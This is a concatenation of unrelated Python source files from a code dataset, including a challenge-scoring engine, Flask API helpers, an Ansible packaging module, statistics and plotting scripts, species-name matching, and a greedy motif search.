{}\\n'.format(repr(proposedsolution)))\r\n return False\r\n else:\r\n print('You have completed {}!'.format(params['name']))\r\n if not 'solved' in params or params['solved'] == False:\r\n params['solved'] = True\r\n if 'points' in params:\r\n print('You have gained {} points. Your total score is now {}.'.format(params['points'], __score__()))\r\n print(\"\")\r\n return True\r\n return wrap\r\n global_challenge_list.append(params)\r\n return wrapper\r\n \r\ndef __score__():\r\n return sum([ i['points'] for i in global_challenge_list if ('points' in i and 'solved' in i and i['solved'] == True) ])\r\n\r\ndef __list_challenges__():\r\n cached_score = __score__()\r\n return [i for i in global_challenge_list if not 'unlock' in i or cached_score >= i['unlock']]\r\n\r\n@helper\r\ndef showhelp(func=None):\r\n '''\\\r\nThe help menu!\r\nUsage is help() -or- help(function)\r\n '''\r\n if not func:\r\n print(__doc__)\r\n print(\"Here is a list of available helper functions:\")\r\n for i in global_help_data:\r\n print(\"\\t{}()\".format(i.__name__))\r\n print('\\n'.join([\"\\t\\t{}\".format(doc) for doc in (i.__doc__).split(\"\\n\")]))\r\n else:\r\n for i in global_help_data:\r\n if func.__name__ == i.__name__:\r\n print(\"\\t{}()\".format(func.__name__))\r\n print('\\n'.join([\"\\t\\t{}\".format(doc) for doc in (func.__doc__).split(\"\\n\")]))\r\n break\r\n else:\r\n print(\"That function wasn't found! 
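game_engine.py relies on functools.wraps so that showhelp() can read `__name__` and `__doc__` off the wrapped helper functions; a minimal demonstration of why that `@wraps` line matters:

```python
from functools import wraps

def helper(func):
    @wraps(func)  # without this, wrap.__name__ would be 'wrap' and __doc__ None
    def wrap(*args, **kwargs):
        return func(*args, **kwargs)
    return wrap

@helper
def greet():
    """Says hello."""
    return 'hello'

print(greet.__name__, '-', greet.__doc__)  # greet - Says hello.
```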
You should probably just run help() to find what you are looking for\")\r\n\r\n@helper\r\ndef challenges():\r\n    '''\\\r\nDisplays the names and descriptions of all unlocked and unsolved challenges\r\n    '''\r\n    result = []\r\n    for module in {mod['module'] for mod in global_challenge_list}:\r\n        result.append(\"Module: {}\".format(module))\r\n        for chal in [i for i in global_challenge_list\r\n                     if i['module'] == module\r\n                     and\r\n                     (not 'solved' in i or i['solved'] == False)\r\n                     and\r\n                     (not 'unlock' in i or i['unlock'] <= __score__())]:\r\n            result.append(\"\\tName: {}\".format(chal['challenge']))\r\n            result.append(\"\\t\\tDescription   : {}\".format(chal['description']))\r\n            result.append(\"\\t\\tExample Data  : {}\".format(repr(chal['example_data'])))\r\n            result.append(\"\\t\\tExample Answer: {}\".format(repr(chal['example_answer'])))\r\n    print('\\n'.join(result))\r\n    return '\\n'.join(result)\r\n\r\n@helper\r\ndef score():\r\n    '''\\\r\nDisplays your score per module and overall\r\n    '''\r\n    result = [\"Total Score: {}\".format(__score__())]\r\n    for module in {mod['module'] for mod in global_challenge_list}:\r\n        result.append(\"{}: {}\".format(module, sum([i['points'] for i in global_challenge_list\r\n                                                   if 'points' in i\r\n                                                   and\r\n                                                   'solved' in i\r\n                                                   and\r\n                                                   i['solved'] == True\r\n                                                   and\r\n                                                   i['module'] == module])))\r\n    print(\"\\n\".join(result))\r\n    return \"\\n\".join(result)\r\n\r\nshowhelp()\r\n","sub_path":"game_engine.py","file_name":"game_engine.py","file_ext":"py","file_size_in_byte":5159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"6711995","text":"import Image\n\nfrom StringIO import StringIO\n\n\nclass ImageFactory(object):\n\n    counter = 0\n\n    @classmethod\n    def create(self, width=200, height=200, return_file=False):\n        \"\"\"\n        Returns image file with specified size.\n        \"\"\"\n        self.counter += 1\n        image = Image.new(\n            'RGBA', size=(width, height), color=(256, 0, 0))\n        if not return_file:\n            return image\n        f = StringIO()\n        image.save(f, 'png')\n        f.name = 'testimage%d.png' % self.counter\n        f.seek(0)\n        return f\n","sub_path":"cleanenv/apps/accounts/tests/factories.py","file_name":"factories.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"530471329","text":"import svmMLiA\ndataArr,labelArr = svmMLiA.loadDataSet('testSet.txt')\nprint(labelArr)\n\n#b,alphas = svmMLiA.smoSimple(dataArr, labelArr, 0.6, 0.001, 40)\n#print(b,alphas[alphas>0])\n\nb,alphas = svmMLiA.smoPK(dataArr, labelArr, 0.6, 0.001, 40)\nws = svmMLiA.calcWs(alphas,dataArr,labelArr)\nfrom numpy import *\ndatMat = mat(dataArr)\nfor i in range(10):\n    print(datMat[i]*mat(ws)+b,labelArr[i])\n\n'''\nBoth the SVM classification function and the model-evaluation (parameter-tuning) function contain vector dot products, and they address linearly separable problems.\nFor nonlinear data mapped to a high-dimensional space (where the problem becomes linear), what is needed is the dot product of the high-dimensional vectors.\nIf the result of those high-dimensional dot products can be expressed directly, there is no need to first map the raw data and then take the dot products.\nA kernel function is exactly the result of the dot product of two high-dimensional vectors.\n'''\n\nsvmMLiA.testRbf()\n\nsvmMLiA.testDigits(('rbf',20))","sub_path":"ch 06/ch06.py","file_name":"ch06.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"133122788","text":"from flask import flash\nfrom flask import session\nfrom flask.views import MethodView\nfrom requests import request\n\nfrom app import app\nfrom app.blueprints.auth import helpers as auth_helpers\n\nDOCUMENTS = tuple('rtf odf ods gnumeric abw doc docx xls xlsx pdf'.split())\nIMAGES = tuple('jpg jpe jpeg png gif svg bmp'.split())\n\n\nclass ProtectedView(MethodView):\n    
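The factories.py record above targets Python 2 (`import Image`, `StringIO`); a sketch of the same in-memory test image under Python 3/Pillow. Note that the original's `(256, 0, 0)` color overflows the 8-bit channel range and omits alpha, so `(255, 0, 0, 255)` is presumably what was intended:

```python
from io import BytesIO
from PIL import Image

def make_test_image(width=200, height=200):
    # render a solid red RGBA image into an in-memory PNG buffer
    buf = BytesIO()
    Image.new('RGBA', (width, height), (255, 0, 0, 255)).save(buf, 'png')
    buf.seek(0)
    return buf

print(len(make_test_image().read()) > 0)  # True
```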
decorators = [auth_helpers.token_required]\n\n\ndef api_request(url_tail, method=\"GET\", files=None, json=None):\n error = False\n headers = {}\n if \"token\" in session:\n headers[\"Authorization\"] = session[\"token\"]\n req = request(\n url=f\"{app.config['API']}/{url_tail}\",\n method=method.lower(),\n headers=headers or None,\n json=json,\n files=files\n )\n if req.status_code != 200:\n error = True\n if \"_schema\" in req.json()[\"message\"]:\n flash(req.json()[\"message\"][\"_schema\"][0], category=\"error\")\n else:\n flash(req.json()[\"message\"], category=\"error\")\n elif req.status_code == 200 and isinstance(req.json(), dict) and \"message\" in req.json():\n flash(req.json()[\"message\"], category=\"success\")\n return req.json(), error\n\n\ndef flash_form_errors(form):\n for field, errors in form.errors.items():\n for error in errors:\n flash(\n f\"{error}\",\n \"error\"\n )\n\n\ndef string_field_to_list(value):\n return \" \".join(value.split()).split(\" \") if value else None\n\n\ndef list_to_string_field(data, prop_to_pop):\n return {\n \"string\": \" \".join([obj[prop_to_pop] for obj in data]),\n \"list\": [obj[prop_to_pop] for obj in data]\n }\n","sub_path":"app/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"573521201","text":"#!/usr/bin/python\n\nimport os\nimport platform\nimport re\n\nfrom ansible.module_utils.basic import AnsibleModule\n\nANSIBLE_METADATA = {\n 'metadata_version': '1.1',\n 'status': ['preview'],\n 'supported_by': 'community'\n}\n\nDOCUMENTATION = '''\n---\nmodule: prepare_packaging_vars\n\nshort_description: Prepare variables describing package being built.\n\ndescription:\n - \"This module prepares a number of variables that describe package that is being built,\nfor example upstream version, package version, source location, and workspace layout.\"\n\noptions:\n zuul_project: Zuul dictionary with packaging project information.\n\n source_repo: An optional Zuul object for upstream source project. 
If not given, the module will try to locate it based on the packaging repo.\n\nauthor:\n    - OpenContrail Developers \n'''\n\n\ndef _debian_get_name_versions(changelog_path):\n    '''Returns a (package_name, version_string) tuple parsed from the changelog'''\n    if not os.path.exists(changelog_path):\n        raise RuntimeError(\"changelog is missing at %s\" % (changelog_path,))\n    with open(changelog_path, \"r\") as fh:\n        manifest = fh.readline()\n\n    # first changelog line looks like \"package (version) dist; urgency=...\";\n    # the named groups are read positionally below\n    matcher = \"^(?P<name>[\\w-]+)\\ \\((?P<version>.*)\\).*$\"\n    groups = re.match(matcher, manifest)\n    if not groups:\n        raise RuntimeError(\"Could not parse debian/changelog\")\n    return groups.group(1), groups.group(2)\n\n\n\ndef get_package_name_versions(module):\n    \"\"\"Returns a dictionary with package information.\"\"\"\n    params = module.params\n\n    src_dir = params['zuul_project']['src_dir']\n    if not os.path.exists(src_dir):\n        raise RuntimeError(\"Could not find packaging repository under %s\" % (src_dir,))\n\n    distro = params['distribution']\n    release = params['release']\n    if distro == \"ubuntu\":\n        debian_path = os.path.join(src_dir, distro, release, \"debian/\")\n        changelog_path = os.path.join(debian_path, \"changelog\")\n\n        package_name, version = _debian_get_name_versions(changelog_path)\n\n        try:\n            (epoch, rest) = version.split(\":\")\n        except ValueError:\n            epoch, rest = None, version\n\n        upstream, debian = rest.split('-')\n        # this is not a pre-processed package release, as it's missing the\n        # ~contrailX version; assume that it's a pristine distro packaging\n        # and append .1~contrailX~ubuntuY.\n        if not 'contrail' in debian:\n            # platform.dist() returns a tuple\n            # ('distro', 'version', 'codename')\n            ubuntu_version = platform.dist()[1]\n            contrail_version = \".1~contrail1~ubuntu{release}\".format(\n                release=ubuntu_version\n            )\n            debian = debian + contrail_version\n\n        target_dir = \"%s-%s\" % (package_name, upstream)\n\n        return {\n            'name': package_name,\n            'debian_dir': debian_path,\n            'full_version': version,\n            'version': {\n                'epoch': epoch,\n                'upstream': upstream,\n                'distro': debian\n            },\n            'target_dir': target_dir,\n        }\n\n    else:\n        raise RuntimeError(\"Unsupported distribution: %s\" % (distro,))\n\n\ndef get_upstream_path(module):\n    zuul_project, upstream_repo = module.params['zuul_project'], module.params['source_repo']\n    package = get_package_name_versions(module)\n\n    if upstream_repo:\n        local_path = upstream_repo['src_dir']\n    else:\n        # deduce local_path based on zuul_project\n        # XXX: This assumes that both packaging repository and upstream source are pulled from\n        # the same zuul connection.\n        packaging_path = zuul_project['src_dir']\n        packaging_short_name = zuul_project['short_name']\n\n        upstream_repo_name = re.sub(\"^packaging-\", \"\", packaging_short_name)\n        packaging_org_dir = \"/\".join(packaging_path.split(\"/\")[:-1])\n\n        local_path = os.path.join(packaging_org_dir, upstream_repo_name)\n        if not os.path.exists(local_path):\n            local_path = None\n\n    if local_path is None:\n        return None\n\n    return {\"source_dir\": local_path }\n\n\nresult = dict(\n    changed=False,\n    original_message='',\n    message='',\n)\n\ndef main(testing=False):\n    module = AnsibleModule(\n        argument_spec=dict(\n            zuul_project=dict(type='dict', required=True),\n            source_repo=dict(type='dict', required=False, default=None),\n            distribution=dict(type='str', required=True),\n            release=dict(type='str', required=True),\n        ),\n    )\n\n    try:\n        result['package'] = get_package_name_versions(module)\n        upstream_source = get_upstream_path(module)\n        if upstream_source:\n            result['upstream'] = upstream_source\n    
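With the regex's named groups restored above (the group names themselves are reconstructions; the code reads the groups positionally), the changelog parsing can be exercised on an assumed example first line:

```python
import re

line = "contrail-api (1:5.0-0ubuntu1) unstable; urgency=low"  # assumed example
m = re.match(r"^(?P<name>[\w-]+) \((?P<version>.*)\).*$", line)
name, version = m.group(1), m.group(2)
# same epoch/upstream/debian split the module performs
epoch, rest = version.split(':') if ':' in version else (None, version)
upstream, debian = rest.split('-')
print(name, epoch, upstream, debian)  # contrail-api 1 5.0 0ubuntu1
```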
except RuntimeError as e:\n        module.fail_json(msg=e.message, **result)\n\n    module.exit_json(**result)\n\nif __name__ == '__main__':\n    main(testing=True)\n","sub_path":"roles/packaging-prepare-generic/library/prepare_packaging_vars.py","file_name":"prepare_packaging_vars.py","file_ext":"py","file_size_in_byte":4888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"390665124","text":"import random\r\nimport pylab\r\nimport numpy as np\r\n\r\n\r\ndef dd_func(x): # distribution density\r\n    return x ** (-1 / 3) * 2 / 3 / 7\r\n\r\n\r\ndef func(x):\r\n    return x ** (3 / 2)\r\n\r\n\r\ndef th_func(x):\r\n    return 1 / 7 * (x ** (2 / 3))\r\n\r\n\r\na = 1\r\nb = 8\r\nprint(\"Enter N:\")\r\nn = int(input())\r\nY = []\r\nfor _ in range(n):\r\n    Y.append(round(func(random.uniform(a, b)), 2))\r\ni = 0\r\nprint(\"Variation series:\\n\", sorted(Y))\r\nx = list(sorted(Y))\r\n\r\nif n < 100:\r\n    M = int(n ** 0.5)\r\nelse:\r\n    M = int(2 * np.log(n))\r\ndx = (x[-1] - x[0]) / M\r\nintervals = []\r\nfor i in range(M + 1):\r\n    intervals.append(x[0] + i * dx)\r\nfrequencies = [0] * (len(intervals) - 1)\r\nfor i in x:\r\n    j = 1\r\n    while j < len(intervals):\r\n        if i == intervals[j]:\r\n            if j + 1 == len(intervals):\r\n                frequencies[j - 1] += 1\r\n            else:\r\n                frequencies[j - 1] += 0.5\r\n                frequencies[j] += 0.5\r\n            j += 1\r\n        elif i < intervals[j]:\r\n            frequencies[j - 1] += 1\r\n            break\r\n        else:\r\n            j += 1\r\ny_g1 = frequencies[:]\r\ni = 0\r\nwhile i < len(y_g1):\r\n    y_g1[i] = y_g1[i] / (n * dx)\r\n    i += 1\r\nx_g1_new = []\r\nfor i in intervals:\r\n    x_g1_new.append(i)\r\n    x_g1_new.append(i)\r\ny_g1_new = [0]\r\nfor i in y_g1:\r\n    y_g1_new.append(i)\r\n    y_g1_new.append(i)\r\ny_g1_new.append(0)\r\nprint(\"Equal-interval histogram:\")\r\ni = 1\r\nwhile i < len(intervals):\r\n    print('\\t\\t{0} for y in \\t({1} , {2})'.format(y_g1_new[2 * i], x_g1_new[2 * i - 1], x_g1_new[2 * i]))\r\n    i += 1\r\npylab.plot(x_g1_new, y_g1_new)\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nxlist = np.arange(x[0] + 0.00001, x[-1], 0.01)\r\nylist = [dd_func(x) for x in xlist]\r\npylab.plot(xlist, ylist)\r\npylab.show()\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nx = []\r\ny = []\r\nfor i in intervals[:-1]:\r\n    x.append(i + dx / 2)\r\nfor i in x:\r\n    y.append(Y.count(i))\r\npylab.plot(x_g1_new, y_g1_new)\r\npylab.plot(x, y_g1)\r\npylab.show()\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nx_emp = intervals[:]\r\ny_emp = [0]\r\nfor i in frequencies:\r\n    y_emp.append(round(y_emp[-1] + i / n, 5))\r\ny_emp.append(1)\r\nx_emp_new = [x_emp[0] - 2]\r\ny_emp_new = []\r\nfor i in y_emp:\r\n    y_emp_new.append(i)\r\n    y_emp_new.append(i)\r\nfor i in x_emp:\r\n    x_emp_new.append(i)\r\n    x_emp_new.append(i)\r\nx_emp_new.append(x_emp[-1] + 2)\r\nprint(\"Empirical distribution function:\")\r\ni = 0\r\nwhile i < len(x_emp):\r\n    print('\\t\\t{0} for y in \\t({1} , {2})'.format(y_emp_new[2 * i], x_emp_new[2 * i], x_emp_new[2 * i + 1]))\r\n    i += 1\r\npylab.plot(x_emp_new, y_emp_new)\r\npylab.show()\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nx = list(sorted(Y))\r\nwhile n % M != 0:\r\n    M -= 1\r\ndx = n // M\r\nintervals = [x[0]]\r\nfor i in range(dx - 1, n, dx):\r\n    intervals.append(x[i])\r\nfrequencies = []\r\ni = 0\r\nwhile i < len(intervals) - 1:\r\n    frequencies.append(dx / (n * (intervals[i+1] - intervals[i])))\r\n    i += 1\r\ny_g2 = frequencies[:]\r\nx_g2_new = []\r\nfor i in intervals:\r\n    x_g2_new.append(i)\r\n    x_g2_new.append(i)\r\ny_g2_new = [0]\r\nfor i in y_g2:\r\n    y_g2_new.append(i)\r\n    y_g2_new.append(i)\r\ny_g2_new.append(0)\r\nprint(\"Equal-probability histogram:\")\r\ni = 1\r\nwhile i < len(intervals):\r\n    print('\\t\\t{0} for y in \\t({1} , {2})'.format(y_g2_new[2 * i], x_g2_new[2 * i - 1], x_g2_new[2 * i]))\r\n    i += 1\r\npylab.plot(x_g2_new, y_g2_new)\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nxlist = np.arange(x[0] + 0.00001, x[-1], 0.01)\r\nylist = [dd_func(x) for x in xlist]\r\npylab.plot(xlist, ylist)\r\npylab.show()\r\n# ---------------------------------------------------------------------------------------------------------------------\r\nx_emp = intervals[:]\r\ny_emp = [0]\r\nfor i in frequencies:\r\n    y_emp.append(round(y_emp[-1] + dx / n, 5))\r\ny_emp.append(1)\r\nx_emp_new = [x_emp[0] - 2]\r\ny_emp_new = []\r\nfor i in y_emp:\r\n    y_emp_new.append(i)\r\n    y_emp_new.append(i)\r\nfor i in x_emp:\r\n    x_emp_new.append(i)\r\n    x_emp_new.append(i)\r\nx_emp_new.append(x_emp[-1] + 2)\r\nprint(\"Empirical distribution function:\")\r\ni = 0\r\nwhile i < len(x_emp):\r\n    print('\\t\\t{0} for y in \\t({1} , {2})'.format(y_emp_new[2 * i], x_emp_new[2 * i], x_emp_new[2 * i + 1]))\r\n    i += 1\r\npylab.plot(x_emp_new, y_emp_new)\r\npylab.show()\r\n# ---------------------------------------------------------------------------------------------------------------------\r\n","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"451165760","text":"# Script to read in and process netCDF file\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport netCDF4\r\nimport pandas as pd\r\nfrom pandas import Series\r\nfrom mpl_toolkits.basemap import Basemap\r\nfrom datetime import date\r\n\r\nncfile=r'D:\\Documents\\TAMU\\Fall 2013\\OCNG 689\\Assignments\\Lab 3'+\\\r\n    r'\\tas_daily_2000-2000.nc' # use at school\r\n#ncfile=r'C:\\Documents\\TAMU\\Fall 2013\\OCNG 689'+\\\r\n#    r'\\tas_d_2000.nc' # use at home\r\n\r\nnc=netCDF4.Dataset(ncfile,mode='r')\r\n\r\n#time=np.array(nc.variables['time'][:])\r\nlat=np.array(nc.variables['latitude'][:])\r\nlon=np.array(nc.variables['longitude'][:])\r\nlon[180:]=lon[180:]-360\r\nlon=abs(lon)\r\ntsfc=np.array(nc.variables['tas'][:])\r\ntsfc=np.squeeze(tsfc)\r\nt_f=(1.8*(tsfc-273))+32\r\n\r\ntime=pd.date_range('1/1/2000','12/31/2000')\r\n\r\nts=Series(data=t_f[:,120,264],index=time)\r\nfig2=plt.figure()\r\nfig2.autofmt_xdate()\r\n\r\nax=plt.gca()\r\nax.set_xlabel('Calendar month')\r\nax.set_ylabel(u'Temperature [\\u00b0F]')\r\nax.set_title('Matthew Raper, OCNG 689, Lab 3\\n'+\\\r\n    'Time Series of Daily Sfc. Air Temp. 
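The equal-interval branch of lab2.py above normalizes bin counts by n*dx; numpy.histogram with density=True performs the same normalization and can serve as a cross-check (bin count taken from the script's small-sample branch):

```python
import numpy as np

data = np.random.uniform(1, 8, 64) ** 1.5        # same transform as func(x)
dens, edges = np.histogram(data, bins=int(64 ** 0.5), density=True)
print(dens.sum() * np.diff(edges)[0])            # 1.0: the density integrates to one
```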
for Year 2000\\n'+\n 'Location: '+\\\n str(lat[120])+u'\\u00b0N, '+str(lon[264])+u'\\u00b0W')\nplt.grid(True,lw=2.0)\nplt.plot_date(ts.index,ts.values,fmt='b-',lw=2.0,label='Surface temp')\nfigManager = plt.get_current_fig_manager()\nfigManager.window.showMaximized()\nplt.show()\n\n#refyear=2000\n#refday=0\n#refdate=date.fromordinal(date(refyear, 1, 1).toordinal() + refday)\n#refdatestr=str(refdate)\n#\n#m=Basemap(llcrnrlat=-90,llcrnrlon=0,urcrnrlat=90,urcrnrlon=360,\\\n# lat_0=0,lon_0=180,projection='moll')\n#\n#lon,lat=np.meshgrid(lon,lat)\n#x,y=m(lon,lat)\n#t_f2=(1.8*((tsfc[refday,:,:])-273))+32\n#\n#fig=plt.figure()\n#m.drawcoastlines()\n#m.drawcountries()\n#m.drawmeridians(np.linspace(0.0,360.0,13.0,endpoint=True))\n#m.drawparallels(np.linspace(-90.0,90.0,13.0,endpoint=True))\n#plt.pcolormesh(x,y,t_f2,cmap=plt.cm.rainbow)\n#ax=plt.gca()\n#ax.set_title('Matt Raper, OCNG 689, Lab 3\\n'+\\\n# 'Surface Air Temperature for '+refdatestr)\n#cb=plt.colorbar(orientation='horizontal')\n#cb.set_label(u'Surface Air Temperature [\\u00b0F]')\n#plt.show()","sub_path":"Assignments/Lab 3/MRaper_Lab3_script.py","file_name":"MRaper_Lab3_script.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"329984730","text":"import logging\nlog = logging.getLogger(\"matches\")\n\n\ndef exact(unmatched_input_spp, unmatched_aln_spp, matched_spp):\n \"\"\" look for exact matches between the keys of two dictionaries \"\"\"\n \n log.info(\"Looking for exact matches between species dictionaries\")\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n matches = set(unmatched_input_spp) & set(unmatched_aln_spp)\n\n unmatched_input_spp, unmatched_aln_spp, matched_spp = process_matches(unmatched_input_spp, unmatched_aln_spp, matched_spp, matches)\n \n log.info(\"%d exact matches found\" %len(matches))\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n log.info(matches) \n log.debug(matched_spp)\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n\ndef process_matches(unmatched_input_spp, unmatched_aln_spp, matched_spp, matches):\n \"\"\" matches is a list of keys of the two dictionaries\"\"\"\n\n for match in matches:\n input_original = unmatched_input_spp.pop(match).original_name\n alnmt_original = unmatched_aln_spp.pop(match).original_name\n matched_spp[input_original] = alnmt_original\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n \ndef choose_maxdata_alnmt_spp(list):\n data = -1\n best = None\n for s in list:\n if s.data >= data:\n best = s\n return best\n \n\ndef exact_binomial(unmatched_input_spp, unmatched_aln_spp, matched_spp, type):\n \"\"\" look for exact binomial matches between species in the two lists \"\"\"\n \n log.info(\"Looking for exact matches between alignment binomial and %s binomial\" % type)\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n\n # build a dictionaries keyed by binomials\n alnmt_binomials = {}\n for s in unmatched_aln_spp.values():\n l = alnmt_binomials.setdefault(s.original_binomial, [])\n l.append(s)\n alnmt_binomials[s.original_binomial] = l\n\n input_binomials = {}\n for s in unmatched_input_spp.values():\n if type == \"original\": \n input_binomials[s.original_binomial] = s\n if type == \"spellchecked\": \n input_binomials[s.binomial] = s\n if type == \"original_genbank\": \n input_binomials[s.original_genbank_binomial] = s\n if type == \"tnrs_genbank\": \n input_binomials[s.tnrs_genbank_binomial] = s\n\n matches = 
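The matches.py record pairs species by intersecting dictionary keys and popping matches out of both unmatched pools; the core move on toy strings (the real code stores objects carrying `original_name`, not plain strings):

```python
unmatched_input = {'abies alba': 'Abies alba L.'}
unmatched_aln = {'abies alba': 'Abies_alba', 'picea abies': 'Picea_abies'}
matched = {}
# exact matches are simply the shared keys; pop removes them from both pools
for key in set(unmatched_input) & set(unmatched_aln):
    matched[unmatched_input.pop(key)] = unmatched_aln.pop(key)
print(matched)        # {'Abies alba L.': 'Abies_alba'}
print(unmatched_aln)  # only the unpaired species remains
```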
set(input_binomials) & set(alnmt_binomials)\n log.info(\"%d binomial matches found\" %len(matches))\n log.info(matches) \n \n for match in matches:\n input_s = input_binomials[match]\n input_original = input_s.original_name\n unmatched_input_spp.pop(input_s.clean_name)\n \n alnmt_s = choose_maxdata_alnmt_spp(alnmt_binomials[match]) \n alnmt_original = alnmt_s.original_name\n unmatched_aln_spp.pop(alnmt_s.clean_name)\n matched_spp[input_original] = alnmt_original\n\n log.debug(\"size of inputs: %d\" %(len(unmatched_input_spp)))\n log.debug(matched_spp)\n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n \ndef choose_best_generic_match(genus, aln_genera):\n \n log.info(\"Looking for genus '%s' in alignment\" % genus)\n \n try:\n alnmt_s = choose_maxdata_alnmt_spp(aln_genera[genus]) \n log.info(\"Best match is '%s'\" % alnmt_s.clean_name)\n except:\n alnmt_s = \"NA\"\n \n return alnmt_s\n \n \ndef genus_replacements(unmatched_input_spp, unmatched_aln_spp, matched_spp, type):\n aln_genera = {}\n matches = {}\n # we make a dictionary keyed by genera\n for s in unmatched_aln_spp.values():\n genus = s.clean_name.split()[0]\n l = aln_genera.setdefault(genus, [])\n l.append(s)\n aln_genera[genus] = l\n \n # now we just loop through the unmatched input species and pop generic matches\n for input_s in unmatched_input_spp.values():\n if type == \"clean_name\" and input_s.clean_name != \"NA\" and len(input_s.clean_name.split())>1:\n genus = input_s.clean_name.split()[0]\n \n else:\n genus = \"NA\" \n\n alnmt_s = choose_best_generic_match(genus, aln_genera)\n if alnmt_s != \"NA\":\n input_original = input_s.original_name\n unmatched_input_spp.pop(input_s.clean_name)\n alnmt_original = alnmt_s.original_name\n unmatched_aln_spp.pop(alnmt_s.clean_name)\n matched_spp[input_original] = alnmt_original\n matches[input_original] = alnmt_original\n \n l = aln_genera[genus]\n i = l.index(alnmt_s)\n removed = l.pop(i)\n aln_genera[genus] = l\n \n log.info(\"%d genus level replacements found\" %len(matches))\n log.info(matches) \n \n return unmatched_input_spp, unmatched_aln_spp, matched_spp\n ","sub_path":"maker/matches.py","file_name":"matches.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"59142466","text":"from collections import Counter\n\ndef InitialMotifs(DNA, k):\n Motifs = []\n for string in DNA:\n Motifs.append(string[:k])\n return Motifs\n\n\ndef Profile(motifs):\n N = len(motifs)\n n = len(motifs[0])\n profile = {\n \"A\": [0 for _ in range(n)],\n \"C\": [0 for _ in range(n)],\n \"T\": [0 for _ in range(n)],\n \"G\": [0 for _ in range(n)],\n }\n for motif in motifs:\n for i in range(len(motif)):\n profile[motif[i]][i] += 1 / N\n return profile\n\n\ndef MostFrequent(profile, string):\n k = len(profile['A'])\n motifs = []\n for i in range(len(string) - k + 1):\n motif = string[i: i + k]\n probability = Probability(profile, motif)\n motifs.append((motif, probability))\n return sorted(motifs, key=lambda x: x[1], reverse=True)[0][0]\n\n\ndef Probability(profile, motif):\n probability = 1\n for i in range(len(motif)):\n nuc = motif[i]\n probability *= profile[nuc][i]\n return probability\n\n\ndef Score(motifs):\n score = 0\n for i in range(len(motifs[0])):\n column = [motif[i] for motif in motifs]\n i = Counter(column)\n score += len(motifs) - i.most_common(1)[0][1]\n return score\n\n\ndef GreedyMotifSearch(DNA, k, t):\n BestMotifs = InitialMotifs(DNA, k)\n for i in range(len(DNA[0]) - k + 1):\n 
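The Score() function in the motif-search record counts, per column, how many motifs disagree with the majority nucleotide; a compact restatement using zip over the motif strings:

```python
from collections import Counter

def score(motifs):
    # everything that is not the column's most common nucleotide is a mismatch
    return sum(len(motifs) - Counter(col).most_common(1)[0][1]
               for col in zip(*motifs))

print(score(["ACGT", "ACGA", "ACCT"]))  # 2
```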
Motifs = []\n motif = DNA[0][i: i + k]\n Motifs.append(motif)\n for i in range(1, t):\n profile = Profile(Motifs)\n Motifs.append(MostFrequent(profile, DNA[i]))\n if Score(Motifs) < Score(BestMotifs):\n BestMotifs = Motifs\n return BestMotifs\n\n\nwith open('/home/masha/Загрузки/rosalind_ba2d.txt', 'r') as f:\n k, t = [int(el) for el in f.readline().split()]\n DNA = []\n for _ in range(t):\n DNA.append(f.readline()[:-1])\n\nBestMotifs = GreedyMotifSearch(DNA, k, t)\n\nwith open('/home/masha/Загрузки/output.txt', 'w') as f:\n f.write('\\n'.join(BestMotifs))","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"650111","text":"import math\nimport meep as mp\nfrom meep import mpb\n\n#\nnum_bands = 1\nk_vec_res = 16;\n\nboundary_k_points = [mp.Vector3(),\n mp.Vector3(0.5),\n mp.Vector3(0.5, 0.5),\n mp.Vector3()]\n\nk_points = mp.interpolate(16, boundary_k_points)\n\nfor k_vec in k_points:\n print(k_vec)\n\ngeometry = [mp.Cylinder(0.2, material=mp.Medium(epsilon=2.2))]\ngeometry_lattice = mp.Lattice(size=mp.Vector3(1,1))\nresolution = 64\n\n\nsolver = mpb.ModeSolver(num_bands=num_bands,\n k_points=k_points,\n geometry=geometry,\n geometry_lattice=geometry_lattice,\n resolution=resolution)\n\n# print_heading(\"Square lattice of rods: TE bands\")\nsolver.run_te()\nsolver.run_tm()\n","sub_path":"LearnFirstBandStructure.py","file_name":"LearnFirstBandStructure.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"177275270","text":"budget = int(input())\nseason = input()\ngroup_count = int(input())\n\nfinal_price = 0\ngroup_discount = 0\neven_discount = 5/100\n\nspr_rent = 3000\nsum_rent = 4200\naut_rent = 4200\nwin_rent = 2600\n\neven_group = group_count % 2 == 0\n\nif group_count <= 6:\n group_discount = (10/100)\nelif group_count >= 7 and group_count <= 11:\n group_discount = (15/100)\nelif group_count >= 12:\n group_discount = (25/100)\n\n\nif season == \"Spring\":\n final_price = spr_rent - 